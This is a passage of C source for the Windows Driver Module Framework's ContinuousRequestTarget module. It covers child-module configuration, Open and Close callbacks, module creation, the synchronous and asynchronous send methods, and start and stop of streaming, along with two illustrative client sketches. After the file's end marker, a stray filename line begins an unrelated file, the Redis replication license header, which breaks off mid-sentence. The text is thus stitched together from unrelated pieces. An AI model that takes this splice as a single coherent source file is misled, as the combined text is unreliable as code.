moduleAttributes.ClientModuleInstanceName = "BufferPoolOutput"; moduleAttributes.PassiveLevel = DmfParentModuleAttributes->PassiveLevel; DMF_DmfModuleAdd(DmfModuleInit, &moduleAttributes, WDF_NO_OBJECT_ATTRIBUTES, &moduleContext->DmfModuleBufferPoolOutput); } else { DmfAssert(moduleConfig->BufferCountOutput == 0); } // BufferPoolContext // ----------------- // DMF_CONFIG_BufferPool_AND_ATTRIBUTES_INIT(&moduleConfigBufferPoolContext, &moduleAttributes); moduleConfigBufferPoolContext.BufferPoolMode = BufferPool_Mode_Source; moduleConfigBufferPoolContext.Mode.SourceSettings.EnableLookAside = TRUE; moduleConfigBufferPoolContext.Mode.SourceSettings.BufferCount = 1; // NOTE: BufferPool context must always be NonPagedPool because it is accessed in the // completion routine running at DISPATCH_LEVEL. 
// moduleConfigBufferPoolContext.Mode.SourceSettings.PoolType = NonPagedPoolNx; moduleConfigBufferPoolContext.Mode.SourceSettings.BufferSize = sizeof(ContinuousRequestTarget_SingleAsynchronousRequestContext); moduleAttributes.ClientModuleInstanceName = "BufferPoolContext"; moduleAttributes.PassiveLevel = DmfParentModuleAttributes->PassiveLevel; DMF_DmfModuleAdd(DmfModuleInit, &moduleAttributes, WDF_NO_OBJECT_ATTRIBUTES, &moduleContext->DmfModuleBufferPoolContext); // QueuedWorkItemSingle // -------------------- // DMF_CONFIG_QueuedWorkItem_AND_ATTRIBUTES_INIT(&moduleConfigQueuedWorkItemSingle, &moduleAttributes); moduleConfigQueuedWorkItemSingle.BufferQueueConfig.SourceSettings.BufferCount = DEFAULT_NUMBER_OF_PENDING_PASSIVE_LEVEL_COMPLETION_ROUTINES; moduleConfigQueuedWorkItemSingle.BufferQueueConfig.SourceSettings.BufferSize = sizeof(ContinuousRequestTarget_QueuedWorkitemContext); // This has to be NonPagedPoolNx because completion routine runs at dispatch level. // moduleConfigQueuedWorkItemSingle.BufferQueueConfig.SourceSettings.PoolType = NonPagedPoolNx; moduleConfigQueuedWorkItemSingle.BufferQueueConfig.SourceSettings.EnableLookAside = TRUE; moduleConfigQueuedWorkItemSingle.EvtQueuedWorkitemFunction = ContinuousRequestTarget_QueuedWorkitemCallbackSingle; DMF_DmfModuleAdd(DmfModuleInit, &moduleAttributes, WDF_NO_OBJECT_ATTRIBUTES, &moduleContext->DmfModuleQueuedWorkitemSingle); if (DmfParentModuleAttributes->PassiveLevel) { moduleContext->CompletionRoutineStream = ContinuousRequestTarget_StreamCompletionRoutinePassive; // QueuedWorkItemStream // -------------------- // DMF_CONFIG_QueuedWorkItem_AND_ATTRIBUTES_INIT(&moduleConfigQueuedWorkItemStream, &moduleAttributes); moduleConfigQueuedWorkItemStream.BufferQueueConfig.SourceSettings.BufferCount = DEFAULT_NUMBER_OF_PENDING_PASSIVE_LEVEL_COMPLETION_ROUTINES; moduleConfigQueuedWorkItemStream.BufferQueueConfig.SourceSettings.BufferSize = sizeof(ContinuousRequestTarget_QueuedWorkitemContext); // This has to be NonPagedPoolNx because completion routine runs at dispatch level. // moduleConfigQueuedWorkItemStream.BufferQueueConfig.SourceSettings.PoolType = NonPagedPoolNx; moduleConfigQueuedWorkItemStream.BufferQueueConfig.SourceSettings.EnableLookAside = TRUE; moduleConfigQueuedWorkItemStream.EvtQueuedWorkitemFunction = ContinuousRequestTarget_QueuedWorkitemCallbackStream; DMF_DmfModuleAdd(DmfModuleInit, &moduleAttributes, WDF_NO_OBJECT_ATTRIBUTES, &moduleContext->DmfModuleQueuedWorkitemStream); } else { moduleContext->CompletionRoutineStream = ContinuousRequestTarget_StreamCompletionRoutine; } FuncExitVoid(DMF_TRACE); } #pragma code_seg() #pragma code_seg("PAGE") _IRQL_requires_max_(PASSIVE_LEVEL) _Must_inspect_result_ static NTSTATUS DMF_ContinuousRequestTarget_Open( _In_ DMFMODULE DmfModule ) /*++ Routine Description: Initialize an instance of a DMF Module of type ContinuousRequestTarget. Arguments: DmfModule - The given DMF Module. Return Value: STATUS_SUCCESS --*/ { NTSTATUS ntStatus; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; WDF_OBJECT_ATTRIBUTES objectAttributes; WDFDEVICE device; PAGED_CODE(); FuncEntry(DMF_TRACE); device = DMF_ParentDeviceGet(DmfModule); moduleContext = DMF_CONTEXT_GET(DmfModule); moduleConfig = DMF_CONFIG_GET(DmfModule); // Streaming is not started yet. 
//
    moduleContext->Stopping = TRUE;

#if !defined(DMF_USER_MODE)
    DMF_Portable_Rundown_Initialize(&moduleContext->StreamRequestsRundown);
    DMF_Portable_EventCreate(&moduleContext->StreamRequestsRundownCompletionEvent,
                             NotificationEvent,
                             FALSE);
#endif

    WDF_OBJECT_ATTRIBUTES_INIT(&objectAttributes);
    objectAttributes.ParentObject = DmfModule;

    // This Collection contains all the requests that are created for streaming. These requests remain
    // in this collection until the Module is Closed.
    //
    ntStatus = WdfCollectionCreate(&objectAttributes,
                                   &moduleContext->CreatedStreamRequestsCollection);
    if (!NT_SUCCESS(ntStatus))
    {
        goto Exit;
    }

    // These are the requests that need to be canceled before streaming stops.
    //
    ntStatus = WdfCollectionCreate(&objectAttributes,
                                   &moduleContext->TransientStreamRequestsCollection);
    if (!NT_SUCCESS(ntStatus))
    {
        goto Exit;
    }

    // It is possible for Client to instantiate this Module without using streaming.
    //
    if (moduleConfig->ContinuousRequestCount > 0)
    {
        for (UINT requestIndex = 0; requestIndex < moduleConfig->ContinuousRequestCount; requestIndex++)
        {
            WDF_OBJECT_ATTRIBUTES requestAttributes;
            WDFREQUEST request;

            WDF_OBJECT_ATTRIBUTES_INIT(&requestAttributes);
            // The request is parented to the device explicitly to handle deletion.
            // When a dynamic Module tree is deleted, the child objects are deleted before the parent.
            // So, if the requests are children of this Module and this Module gets implicitly deleted,
            // the requests get the delete operation first. And if a request is already sent to an IO Target,
            // WDF verifier complains about it.
            // Thus, requests are parented to the device and are deleted when the collection is deleted
            // in the DMF Close callback.
            //
            requestAttributes.ParentObject = device;
            ntStatus = WdfRequestCreate(&requestAttributes,
                                        moduleContext->IoTarget,
                                        &request);
            if (!NT_SUCCESS(ntStatus))
            {
                TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfRequestCreate fails: ntStatus=%!STATUS!", ntStatus);
                goto Exit;
            }
            ntStatus = WdfCollectionAdd(moduleContext->CreatedStreamRequestsCollection,
                                        request);
            if (!NT_SUCCESS(ntStatus))
            {
                WdfObjectDelete(request);
                goto Exit;
            }
        }
    }
#if !defined(DMF_USER_MODE)
    else
    {
        DMF_Portable_EventSet(&moduleContext->StreamRequestsRundownCompletionEvent);
        ntStatus = STATUS_SUCCESS;
    }
#endif

Exit:

    if (!NT_SUCCESS(ntStatus))
    {
        if (moduleContext->CreatedStreamRequestsCollection != NULL)
        {
            ContinuousRequestTarget_DeleteStreamRequestsFromCollection(moduleContext);
            WdfObjectDelete(moduleContext->CreatedStreamRequestsCollection);
            moduleContext->CreatedStreamRequestsCollection = NULL;
        }
        if (moduleContext->TransientStreamRequestsCollection != NULL)
        {
            WdfObjectDelete(moduleContext->TransientStreamRequestsCollection);
            moduleContext->TransientStreamRequestsCollection = NULL;
        }
    }

    FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus);

    return ntStatus;
}
#pragma code_seg()

#pragma code_seg("PAGE")
_IRQL_requires_max_(PASSIVE_LEVEL)
static
VOID
DMF_ContinuousRequestTarget_Close(
    _In_ DMFMODULE DmfModule
    )
/*++

Routine Description:

    Uninitialize an instance of a DMF Module of type ContinuousRequestTarget.

Arguments:

    DmfModule - The given DMF Module.

Return Value:

    None

--*/
{
    DMF_CONTEXT_ContinuousRequestTarget* moduleContext;

    PAGED_CODE();

    FuncEntry(DMF_TRACE);

    moduleContext = DMF_CONTEXT_GET(DmfModule);

    // NOTE: Do not stop streaming here because this can happen after Release Hardware!
    //       In that case, cancellation of requests works in an undefined manner.
    //       Streaming *must* be stopped when this callback happens!
// DmfAssert(moduleContext->Stopping); // There is no need to verify that IoTarget is NULL. Client may not clear it because it is // not necessary to do so. // // Clean up resources created in Open. // if (moduleContext->TransientStreamRequestsCollection != NULL) { DmfAssert(WdfCollectionGetCount(moduleContext->TransientStreamRequestsCollection) == 0); WdfObjectDelete(moduleContext->TransientStreamRequestsCollection); moduleContext->TransientStreamRequestsCollection = NULL; } if (moduleContext->CreatedStreamRequestsCollection != NULL) { ContinuousRequestTarget_DeleteStreamRequestsFromCollection(moduleContext); WdfObjectDelete(moduleContext->CreatedStreamRequestsCollection); moduleContext->CreatedStreamRequestsCollection = NULL; } FuncExitVoid(DMF_TRACE); } #pragma code_seg() /////////////////////////////////////////////////////////////////////////////////////////////////////// // Public Calls by Client /////////////////////////////////////////////////////////////////////////////////////////////////////// // #pragma code_seg("PAGE") _IRQL_requires_max_(PASSIVE_LEVEL) _Must_inspect_result_ NTSTATUS DMF_ContinuousRequestTarget_Create( _In_ WDFDEVICE Device, _In_ DMF_MODULE_ATTRIBUTES* DmfModuleAttributes, _In_ WDF_OBJECT_ATTRIBUTES* ObjectAttributes, _Out_ DMFMODULE* DmfModule ) /*++ Routine Description: Create an instance of a DMF Module of type ContinuousRequestTarget. Arguments: Device - Client's WDFDEVICE object. DmfModuleAttributes - Opaque structure that contains parameters DMF needs to initialize the Module. ObjectAttributes - WDF object attributes for DMFMODULE. DmfModule - Address of the location where the created DMFMODULE handle is returned. Return Value: NTSTATUS --*/ { NTSTATUS ntStatus; DMF_MODULE_DESCRIPTOR dmfModuleDescriptor_ContinuousRequestTarget; DMF_CALLBACKS_WDF dmfCallbacksWdf_ContinuousRequestTarget; DMF_CALLBACKS_DMF dmfCallbacksDmf_ContinuousRequestTarget; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; PAGED_CODE(); FuncEntry(DMF_TRACE); moduleConfig = (DMF_CONFIG_ContinuousRequestTarget*)DmfModuleAttributes->ModuleConfigPointer; DMF_CALLBACKS_DMF_INIT(&dmfCallbacksDmf_ContinuousRequestTarget); dmfCallbacksDmf_ContinuousRequestTarget.ChildModulesAdd = DMF_ContinuousRequestTarget_ChildModulesAdd; dmfCallbacksDmf_ContinuousRequestTarget.DeviceOpen = DMF_ContinuousRequestTarget_Open; dmfCallbacksDmf_ContinuousRequestTarget.DeviceClose = DMF_ContinuousRequestTarget_Close; DMF_MODULE_DESCRIPTOR_INIT_CONTEXT_TYPE(dmfModuleDescriptor_ContinuousRequestTarget, ContinuousRequestTarget, DMF_CONTEXT_ContinuousRequestTarget, DMF_MODULE_OPTIONS_DISPATCH_MAXIMUM, DMF_MODULE_OPEN_OPTION_OPEN_Create); dmfModuleDescriptor_ContinuousRequestTarget.CallbacksDmf = &dmfCallbacksDmf_ContinuousRequestTarget; if (moduleConfig->PurgeAndStartTargetInD0Callbacks) { DmfAssert(DmfModuleAttributes->DynamicModule == FALSE); DMF_CALLBACKS_WDF_INIT(&dmfCallbacksWdf_ContinuousRequestTarget); dmfCallbacksWdf_ContinuousRequestTarget.ModuleD0Entry = DMF_ContinuousRequestTarget_ModuleD0Entry; dmfCallbacksWdf_ContinuousRequestTarget.ModuleD0Exit = DMF_ContinuousRequestTarget_ModuleD0Exit; dmfModuleDescriptor_ContinuousRequestTarget.CallbacksWdf = &dmfCallbacksWdf_ContinuousRequestTarget; } ntStatus = DMF_ModuleCreate(Device, DmfModuleAttributes, ObjectAttributes, &dmfModuleDescriptor_ContinuousRequestTarget, DmfModule); if (! 
NT_SUCCESS(ntStatus))
    {
        TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "DMF_ModuleCreate fails: ntStatus=%!STATUS!", ntStatus);
    }

    FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus);

    return(ntStatus);
}
#pragma code_seg()

// Module Methods
//

_IRQL_requires_max_(DISPATCH_LEVEL)
VOID
DMF_ContinuousRequestTarget_BufferPut(
    _In_ DMFMODULE DmfModule,
    _In_ VOID* ClientBuffer
    )
/*++

Routine Description:

    Add the output buffer back to OutputBufferPool.

Arguments:

    DmfModule - This Module's handle.
    ClientBuffer - The buffer to add to the list.
                   NOTE: This must be a properly formed buffer that was created by this Module.

Return Value:

    None

--*/
{
    DMF_CONTEXT_ContinuousRequestTarget* moduleContext;

    FuncEntry(DMF_TRACE);

    DMFMODULE_VALIDATE_IN_METHOD(DmfModule, ContinuousRequestTarget);

    moduleContext = DMF_CONTEXT_GET(DmfModule);

    DMF_BufferPool_Put(moduleContext->DmfModuleBufferPoolOutput,
                       ClientBuffer);

    FuncExitVoid(DMF_TRACE);
}

_IRQL_requires_max_(DISPATCH_LEVEL)
VOID
DMF_ContinuousRequestTarget_IoTargetClear(
    _In_ DMFMODULE DmfModule
    )
/*++

Routine Description:

    Clears the IoTarget.

Arguments:

    DmfModule - This Module's handle.

Return Value:

    VOID

--*/
{
    DMF_CONTEXT_ContinuousRequestTarget* moduleContext;

    FuncEntry(DMF_TRACE);

    DMFMODULE_VALIDATE_IN_METHOD(DmfModule, ContinuousRequestTarget);

    moduleContext = DMF_CONTEXT_GET(DmfModule);

    DmfAssert(moduleContext->IoTarget != NULL);
    DmfAssert(moduleContext->Stopping);

    moduleContext->IoTarget = NULL;

    FuncExitVoid(DMF_TRACE);
}

_IRQL_requires_max_(DISPATCH_LEVEL)
NTSTATUS
DMF_ContinuousRequestTarget_IoTargetSet(
    _In_ DMFMODULE DmfModule,
    _In_ WDFIOTARGET IoTarget
    )
/*++

Routine Description:

    Set the IoTarget to Send Requests to.

Arguments:

    DmfModule - This Module's handle.
    IoTarget - IO Target to send requests to.

Return Value:

    NTSTATUS

--*/
{
    NTSTATUS ntStatus;
    DMF_CONTEXT_ContinuousRequestTarget* moduleContext;

    FuncEntry(DMF_TRACE);

    DMFMODULE_VALIDATE_IN_METHOD(DmfModule, ContinuousRequestTarget);

    ntStatus = STATUS_SUCCESS;

    moduleContext = DMF_CONTEXT_GET(DmfModule);

    DmfAssert(IoTarget != NULL);
    DmfAssert(moduleContext->IoTarget == NULL);

    moduleContext->IoTarget = IoTarget;

    FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus);

    return ntStatus;
}

_IRQL_requires_max_(DISPATCH_LEVEL)
NTSTATUS
DMF_ContinuousRequestTarget_Send(
    _In_ DMFMODULE DmfModule,
    _In_reads_bytes_(RequestLength) VOID* RequestBuffer,
    _In_ size_t RequestLength,
    _Out_writes_bytes_(ResponseLength) VOID* ResponseBuffer,
    _In_ size_t ResponseLength,
    _In_ ContinuousRequestTarget_RequestType RequestType,
    _In_ ULONG RequestIoctl,
    _In_ ULONG RequestTimeoutMilliseconds,
    _In_opt_ EVT_DMF_ContinuousRequestTarget_SendCompletion* EvtContinuousRequestTargetSingleAsynchronousRequest,
    _In_opt_ VOID* SingleAsynchronousRequestClientContext
    )
/*++

Routine Description:

    Creates and sends an asynchronous request to the IoTarget given a buffer, IOCTL and other information.

Arguments:

    DmfModule - This Module's handle.
    RequestBuffer - Buffer of data to attach to request to be sent.
    RequestLength - Number of bytes in RequestBuffer to send.
    ResponseBuffer - Buffer of data that is returned by the request.
    ResponseLength - Size of Response Buffer in bytes.
    RequestType - Read or Write or Ioctl.
    RequestIoctl - The given IOCTL.
    RequestTimeoutMilliseconds - Timeout value in milliseconds of the transfer or zero for no timeout.
    EvtContinuousRequestTargetSingleAsynchronousRequest - Callback to be called in completion routine.
    SingleAsynchronousRequestClientContext - Client context sent in callback.

Return Value:

    STATUS_SUCCESS if the request was created and sent; other NTSTATUS if there is an error.

--*/
{
    NTSTATUS ntStatus;
    ContinuousRequestTarget_CompletionOptions completionOption;

    FuncEntry(DMF_TRACE);

    ntStatus = STATUS_SUCCESS;

    DMFMODULE_VALIDATE_IN_METHOD(DmfModule, ContinuousRequestTarget);

    ntStatus = DMF_ModuleReference(DmfModule);
    if (!NT_SUCCESS(ntStatus))
    {
        goto Exit;
    }

    if (DMF_IsModulePassiveLevel(DmfModule))
    {
        completionOption = ContinuousRequestTarget_CompletionOptions_Passive;
    }
    else
    {
        completionOption = ContinuousRequestTarget_CompletionOptions_Dispatch;
    }

    ntStatus = ContinuousRequestTarget_RequestCreateAndSend(DmfModule,
                                                            FALSE,
                                                            RequestBuffer,
                                                            RequestLength,
                                                            ResponseBuffer,
                                                            ResponseLength,
                                                            RequestType,
                                                            RequestIoctl,
                                                            RequestTimeoutMilliseconds,
                                                            completionOption,
                                                            NULL,
                                                            EvtContinuousRequestTargetSingleAsynchronousRequest,
                                                            SingleAsynchronousRequestClientContext);
    if (! NT_SUCCESS(ntStatus))
    {
        DMF_ModuleDereference(DmfModule);
        TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "ContinuousRequestTarget_RequestCreateAndSend fails: ntStatus=%!STATUS!", ntStatus);
        goto Exit;
    }

Exit:

    return ntStatus;
}

_IRQL_requires_max_(DISPATCH_LEVEL)
NTSTATUS
DMF_ContinuousRequestTarget_SendEx(
    _In_ DMFMODULE DmfModule,
    _In_reads_bytes_(RequestLength) VOID* RequestBuffer,
    _In_ size_t RequestLength,
    _Out_writes_bytes_(ResponseLength) VOID* ResponseBuffer,
    _In_ size_t ResponseLength,
    _In_ ContinuousRequestTarget_RequestType RequestType,
    _In_ ULONG RequestIoctl,
    _In_ ULONG RequestTimeoutMilliseconds,
    _In_ ContinuousRequestTarget_CompletionOptions CompletionOption,
    _In_opt_ EVT_DMF_ContinuousRequestTarget_SendCompletion* EvtContinuousRequestTargetSingleAsynchronousRequest,
    _In_opt_ VOID* SingleAsynchronousRequestClientContext
    )
/*++

Routine Description:

    Creates and sends an asynchronous request to the IoTarget given a buffer, IOCTL and other information.
    Once the request completes, EvtContinuousRequestTargetSingleAsynchronousRequest is called
    (at PASSIVE_LEVEL when CompletionOption specifies a passive completion).

Arguments:

    DmfModule - This Module's handle.
    RequestBuffer - Buffer of data to attach to request to be sent.
    RequestLength - Number of bytes in RequestBuffer to send.
    ResponseBuffer - Buffer of data that is returned by the request.
    ResponseLength - Size of Response Buffer in bytes.
    RequestType - Read or Write or Ioctl.
    RequestIoctl - The given IOCTL.
    RequestTimeoutMilliseconds - Timeout value in milliseconds of the transfer or zero for no timeout.
    CompletionOption - Completion option associated with the completion routine.
    EvtContinuousRequestTargetSingleAsynchronousRequest - Callback to be called in completion routine.
    SingleAsynchronousRequestClientContext - Client context sent in callback.

Return Value:

    STATUS_SUCCESS if the request was created and sent; other NTSTATUS if there is an error.

--*/
{
    NTSTATUS ntStatus = STATUS_SUCCESS;

    FuncEntry(DMF_TRACE);

    DMFMODULE_VALIDATE_IN_METHOD(DmfModule, ContinuousRequestTarget);

    ntStatus = DMF_ModuleReference(DmfModule);
    if (!NT_SUCCESS(ntStatus))
    {
        goto Exit;
    }

    ntStatus = ContinuousRequestTarget_RequestCreateAndSend(DmfModule,
                                                            FALSE,
                                                            RequestBuffer,
                                                            RequestLength,
                                                            ResponseBuffer,
                                                            ResponseLength,
                                                            RequestType,
                                                            RequestIoctl,
                                                            RequestTimeoutMilliseconds,
                                                            CompletionOption,
                                                            NULL,
                                                            EvtContinuousRequestTargetSingleAsynchronousRequest,
                                                            SingleAsynchronousRequestClientContext);
    if (! NT_SUCCESS(ntStatus))
    {
        DMF_ModuleDereference(DmfModule);
        TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "ContinuousRequestTarget_RequestCreateAndSend fails: ntStatus=%!STATUS!", ntStatus);
        goto Exit;
    }

Exit:

    return ntStatus;
}

_IRQL_requires_max_(DISPATCH_LEVEL)
NTSTATUS
DMF_ContinuousRequestTarget_SendSynchronously(
    _In_ DMFMODULE DmfModule,
    _In_reads_bytes_(RequestLength) VOID* RequestBuffer,
    _In_ size_t RequestLength,
    _Out_writes_bytes_(ResponseLength) VOID* ResponseBuffer,
    _In_ size_t ResponseLength,
    _In_ ContinuousRequestTarget_RequestType RequestType,
    _In_ ULONG RequestIoctl,
    _In_ ULONG RequestTimeoutMilliseconds,
    _Out_opt_ size_t* BytesWritten
    )
/*++

Routine Description:

    Creates and sends a synchronous request to the IoTarget given a buffer, IOCTL and other information.

Arguments:

    DmfModule - This Module's handle.
    RequestBuffer - Buffer of data to attach to request to be sent.
    RequestLength - Number of bytes in RequestBuffer to send.
    ResponseBuffer - Buffer of data that is returned by the request.
    ResponseLength - Size of Response Buffer in bytes.
    RequestType - Read or Write or Ioctl.
    RequestIoctl - The given IOCTL.
    RequestTimeoutMilliseconds - Timeout value in milliseconds of the transfer or zero for no timeout.
    BytesWritten - Bytes returned by the transaction.

Return Value:

    STATUS_SUCCESS if the request was created and sent; other NTSTATUS if there is an error.

--*/
{
    NTSTATUS ntStatus = STATUS_SUCCESS;

    FuncEntry(DMF_TRACE);

    DMFMODULE_VALIDATE_IN_METHOD(DmfModule, ContinuousRequestTarget);

    ntStatus = ContinuousRequestTarget_RequestCreateAndSend(DmfModule,
                                                            TRUE,
                                                            RequestBuffer,
                                                            RequestLength,
                                                            ResponseBuffer,
                                                            ResponseLength,
                                                            RequestType,
                                                            RequestIoctl,
                                                            RequestTimeoutMilliseconds,
                                                            ContinuousRequestTarget_CompletionOptions_Default,
                                                            BytesWritten,
                                                            NULL,
                                                            NULL);
    if (! NT_SUCCESS(ntStatus))
    {
        TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "ContinuousRequestTarget_RequestCreateAndSend fails: ntStatus=%!STATUS!", ntStatus);
        goto Exit;
    }

Exit:

    return ntStatus;
}
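// Illustrative sketch (not part of this Module): how a Client might call the
// synchronous Method above. The Module handle is assumed to have been created
// elsewhere; the IOCTL code and buffer layout are hypothetical placeholders,
// and the RequestType enumerator is assumed from the "Read or Write or Ioctl"
// description in the documentation blocks above.
//
#if defined(SKETCH_ONLY)
#define IOCTL_SKETCH_GET_VERSION CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)

NTSTATUS
Sketch_GetVersion(
    _In_ DMFMODULE DmfModuleContinuousRequestTarget
    )
{
    NTSTATUS ntStatus;
    UCHAR versionBuffer[16];
    size_t bytesWritten;

    // Sends the IOCTL and blocks until completion or the 1 second timeout.
    //
    ntStatus = DMF_ContinuousRequestTarget_SendSynchronously(DmfModuleContinuousRequestTarget,
                                                             NULL,
                                                             0,
                                                             versionBuffer,
                                                             sizeof(versionBuffer),
                                                             ContinuousRequestTarget_RequestType_Ioctl,
                                                             IOCTL_SKETCH_GET_VERSION,
                                                             1000,
                                                             &bytesWritten);
    if (NT_SUCCESS(ntStatus))
    {
        // bytesWritten holds the number of bytes the target returned in versionBuffer.
        //
    }
    return ntStatus;
}
#endif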
_IRQL_requires_max_(DISPATCH_LEVEL)
NTSTATUS
DMF_ContinuousRequestTarget_Start(
    _In_ DMFMODULE DmfModule
    )
/*++

Routine Description:

    Starts streaming Asynchronous requests to the IoTarget.

Arguments:

    DmfModule - This Module's handle.

Return Value:

    STATUS_SUCCESS if streaming started; other NTSTATUS if there is an error.

--*/
{
    NTSTATUS ntStatus;
    DMF_CONFIG_ContinuousRequestTarget* moduleConfig;
    DMF_CONTEXT_ContinuousRequestTarget* moduleContext;

    FuncEntry(DMF_TRACE);

    DMFMODULE_VALIDATE_IN_METHOD(DmfModule, ContinuousRequestTarget);

    moduleConfig = DMF_CONFIG_GET(DmfModule);
    moduleContext = DMF_CONTEXT_GET(DmfModule);

    ntStatus = STATUS_SUCCESS;

    DmfAssert(moduleContext->Stopping);

    // Clear the Stopping flag as streaming will now start.
    //
    moduleContext->Stopping = FALSE;

#if !defined(DMF_USER_MODE)
    // In case it was previously stopped, re-initialize fields used for rundown.
    //
    DMF_Portable_EventReset(&moduleContext->StreamRequestsRundownCompletionEvent);
    DMF_Portable_Rundown_Reinitialize(&moduleContext->StreamRequestsRundown);
#endif

    moduleContext->StreamingRequestCount = moduleConfig->ContinuousRequestCount;

    for (UINT requestIndex = 0; requestIndex < moduleConfig->ContinuousRequestCount; requestIndex++)
    {
        WDFREQUEST request;

        request = (WDFREQUEST)WdfCollectionGetItem(moduleContext->CreatedStreamRequestsCollection,
                                                   requestIndex);
        DmfAssert(request != NULL);
        // Add it to the list of Transient requests a single time when Streaming starts.
        //
        ntStatus = WdfCollectionAdd(moduleContext->TransientStreamRequestsCollection,
                                    request);
        if (NT_SUCCESS(ntStatus))
        {
            // Actually send the Request down.
            //
            ntStatus = ContinuousRequestTarget_StreamRequestSend(DmfModule,
                                                                 request);
        }
        if (! NT_SUCCESS(ntStatus))
        {
#if !defined(DMF_USER_MODE)
            // Subtract the rest of stream requests yet to start.
            //
            while (requestIndex++ < moduleConfig->ContinuousRequestCount)
            {
                ContinuousRequestTarget_DecreaseStreamRequestCount(moduleContext);
            }
#endif
            TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "ContinuousRequestTarget_StreamRequestSend fails: ntStatus=%!STATUS!", ntStatus);
            goto Exit;
        }
    }

Exit:

    return ntStatus;
}

_IRQL_requires_max_(PASSIVE_LEVEL)
VOID
DMF_ContinuousRequestTarget_Stop(
    _In_ DMFMODULE DmfModule
    )
/*++

Routine Description:

    Stops streaming Asynchronous requests to the IoTarget and Cancels all the existing requests.

Arguments:

    DmfModule - This Module's handle.

Return Value:

    None

--*/
{
    DMF_CONTEXT_ContinuousRequestTarget* moduleContext;
    DMF_CONFIG_ContinuousRequestTarget* moduleConfig;
    NTSTATUS ntStatus;

    FuncEntry(DMF_TRACE);

    DMFMODULE_VALIDATE_IN_METHOD(DmfModule, ContinuousRequestTarget);

    moduleConfig = DMF_CONFIG_GET(DmfModule);
    moduleContext = DMF_CONTEXT_GET(DmfModule);

    ntStatus = DMF_ModuleReference(DmfModule);
    if (!NT_SUCCESS(ntStatus))
    {
        DmfAssert(FALSE);
        goto Exit;
    }

    // Tell the rest of the Module that Client has stopped streaming.
    // (It is possible this is called twice if removal of WDFIOTARGET occurs on a stream that starts/stops
    // automatically.)
    //
    moduleContext->Stopping = TRUE;

    // Cancel all requests from target. Do not wait until all pending requests have returned.
    //
    ContinuousRequestTarget_RequestsCancel(DmfModule);

    DMF_ModuleDereference(DmfModule);

    DmfAssert(moduleContext->IoTarget != NULL);

Exit:
    ;
}

_IRQL_requires_max_(PASSIVE_LEVEL)
VOID
DMF_ContinuousRequestTarget_StopAndWait(
    _In_ DMFMODULE DmfModule
    )
/*++

Routine Description:

    Stops streaming Asynchronous requests to the IoTarget and waits for all pending requests to return.

Arguments:

    DmfModule - This Module's handle.

Return Value:

    None

--*/
{
    DMF_CONTEXT_ContinuousRequestTarget* moduleContext;
    NTSTATUS ntStatus;

    FuncEntry(DMF_TRACE);

    DMFMODULE_VALIDATE_IN_METHOD(DmfModule, ContinuousRequestTarget);

    moduleContext = DMF_CONTEXT_GET(DmfModule);

    ntStatus = DMF_ModuleReference(DmfModule);
    if (!NT_SUCCESS(ntStatus))
    {
        DmfAssert(FALSE);
        goto Exit;
    }

    // Stop Streaming. This is an internal function in case it needs to be called in the future.
    //
    ContinuousRequestTarget_StopAndWait(DmfModule);

    DMF_ModuleDereference(DmfModule);

Exit:

    FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus);
}

// eof: Dmf_ContinuousRequestTarget.c
//
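// Illustrative sketch (not part of the Module above): the expected streaming
// lifecycle, pieced together from the Methods defined in this file. The Module
// handle and WDFIOTARGET are assumed to be created by the Client elsewhere.
//
#if defined(SKETCH_ONLY)
VOID
Sketch_StreamingLifecycle(
    _In_ DMFMODULE DmfModuleContinuousRequestTarget,
    _In_ WDFIOTARGET IoTarget
    )
{
    NTSTATUS ntStatus;

    // Associate the target before streaming starts.
    //
    ntStatus = DMF_ContinuousRequestTarget_IoTargetSet(DmfModuleContinuousRequestTarget,
                                                       IoTarget);
    if (! NT_SUCCESS(ntStatus))
    {
        return;
    }

    // Send the ContinuousRequestCount streaming requests down.
    //
    ntStatus = DMF_ContinuousRequestTarget_Start(DmfModuleContinuousRequestTarget);
    if (! NT_SUCCESS(ntStatus))
    {
        return;
    }

    // ...streaming runs; the Client's output-buffer callback consumes data...

    // Stop streaming and wait for pending requests and in-flight callbacks.
    //
    DMF_ContinuousRequestTarget_StopAndWait(DmfModuleContinuousRequestTarget);

    // Dissociate the target. (Streaming must already be stopped here.)
    //
    DMF_ContinuousRequestTarget_IoTargetClear(DmfModuleContinuousRequestTarget);
}
#endif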
900817.c
/* Asynchronous replication implementation. * * Copyright (c) 2009-2012, Salvatore Sanfilippo <antirez at gmail dot com> * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * * Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * Neither the name of Redis nor the names of its contributors may be used * to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING 